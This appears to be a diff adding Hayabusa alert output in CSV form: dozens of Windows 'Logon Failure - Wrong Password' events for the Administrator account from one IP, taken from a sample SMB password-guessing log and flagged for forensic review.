+2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q4o93QpJL4pxx94q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lQf1OsHb4lpgMPbl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcJUYelneVqBQjr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I0d6daEeIadJRbBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQ1hvZeT9aulbu4g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75RBCjr2eRDLhTqW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: maMlpuzhleuQHhIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkpNfbOHUr7cY52z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7SUyYbLPfPAGUfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7clwftf7R0uNbqJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IsIyPcMAPnlxJa12 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CKcyo1Ec4rs3Z2g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZlzKvZLO8CDotkbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyRpYYtmD8389Yvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t3Pg0H9Gncoyr45m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zksaaJ7Z1wuy4PMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WdYAEdfWxLdM1rh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VyYFJRy0cxPfqDFh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv2Lz1h1bG6UatVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FLKPLfEe3PpEzRNc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJWv7ggzCSyEznOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZUtR9CNfKMHQMd7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6fYNHuRTqi15cRkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DvxZHwJwrBYXlEyv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jscJTJjhKvCtDl8q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZEIEjcimMyHWUsp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 30OdVRH9ZATLezsR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJ1OSBVZHKmyOzj8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JanG6Q0oYpTdm9mC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PWCwDYL3T7TAdb0J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRdyZaio1HjUKlNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VjiRnExy9TzZTG0R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztUyQpl8c9RoAr1j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jC23QAFM07q7cfVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TSM8lmdOFoDslQNa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sGZaUGAT1oXmnGLB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMNo21pTA67pb7Go | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiTZCqK3m4icL1Vi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZaZ2mnoihX1Ec4di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ihm9zaXkmWklXk4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yLIZ3tlw9VlQmK28 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GVHzJHTi55NbxXYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1FROeEnMLna2fTTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pio6ZZ9pV0pS2Whi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h1aD2w5U5K9ND5HV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zF8Jb4GpG4D3xn9i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edv4GwGfL156V1xe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Irvneva9RFn44iII | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dHtJFI8OL9kJylL5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F5Q4h62T77hGjhKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdSALwo9td9xUeBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1kYfoqz1r1NuEn04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7X400gufqdunUa8j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lLR8z7g0GY8r7a1r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHMztrxiKBGtNqkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eBQevVhmZs5gHFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lyQCs0PG6fGzpidu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnsPjnCieyoFIbJZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ku6mjVaG1lCJrAo1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VwiyVIWHOGuHzhdO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92v1rXcj5c0Lt3OF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yO2JYd6FfM2Y7px9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ltr5g8ZWUAdrPKxg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fjiPMy5uOTbbmaQ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HDRVOzxca9wDJziV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DV28RjUK26Je2Dr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seoetT43w0S3FEss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: IdIU9Q9Ig4Bd3Aps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGzuHSHT59Qnp5jI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPA1J7aQrZ064WSf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhLFXDMUKGfdoc4S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: apVAhc6o3dhLmUll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYMdQeB4ZpFm8xDh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
